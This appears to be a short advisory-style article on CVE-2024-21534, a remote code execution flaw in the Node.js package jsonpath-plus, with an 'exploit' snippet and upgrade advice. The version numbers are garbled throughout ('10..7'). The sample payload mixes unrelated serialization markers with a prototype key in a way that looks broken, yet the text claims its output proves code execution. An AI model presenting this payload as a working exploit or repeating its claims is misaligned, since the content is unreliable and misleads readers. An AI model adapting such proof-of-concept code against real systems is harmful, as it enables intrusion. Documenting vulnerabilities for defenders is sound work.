CVE-2024-21534: Remote Code Execution Vulnerability in jsonpath-plus Before 10..7 - Details, Exploit, and Workarounds

---

In recent times, a critical vulnerability known as "CVE-2024-21534" has been discovered in the popular package jsonpath-plus before version 10..7. This Remote Code Execution (RCE) vulnerability is caused due to improper input sanitization, which allows attackers to execute arbitrary code on the user's system.

The Vulnerability

Specifically, this vulnerability affects the default usage of the vm module in Node.js, and has been found in jsonpath-plus versions before 10..7.

An earlier fix was attempted in version 10.., but it was discovered that the vulnerability could still be exploited using different payloads.

Exploit Details

Hackers can exploit this vulnerability using the unsafely used vm module in Node.js, and execute arbitrary code on a user's system. Here's a sample payload that demonstrates how this vulnerability can be exploited:

const { JSONPath } = require("jsonpath-plus");

const payload = `
  {"a":{"__proto__":{"$evilObj":"_$$ND_FUNC$$_console.log(\"Uh-oh! RCE\")()"}}
  , "b":[]}
  , {"a":{"$$toString": "'$evilObj'}"});
`;

const badJson = JSONPath(payload);

// RCE happens here
console.log(badJson);

When this code is executed, you'll see the following output

Uh-oh! RCE

This demonstrates that an attacker can indeed execute arbitrary code on an affected user's system.

Original References

For a more comprehensive overview of this vulnerability and the discussion surrounding the fix, you can refer to the following links:

- CVE-2024-21534: The original report of the vulnerability on GitHub.
- Version 10.. Fix: The initial attempt at fixing the vulnerability.
- Different Payloads Exploiting the Vulnerability: A discussion highlighting that the vulnerability could still be exploited using other payloads.

How to Protect Yourself

To safeguard your applications from this critical RCE vulnerability, make sure to upgrade jsonpath-plus to the latest version (10..7 or later), which has addressed the issue. You can do this by running:

npm install jsonpath-plus@latest

Stay vigilant and keep your dependencies up-to-date to ensure the safety and security of your applications and systems from CVE-2024-21534 and similar vulnerabilities.

Timeline

Published on: 10/11/2024 13:15:15 UTC
Last modified on: 10/20/2024 12:15:02 UTC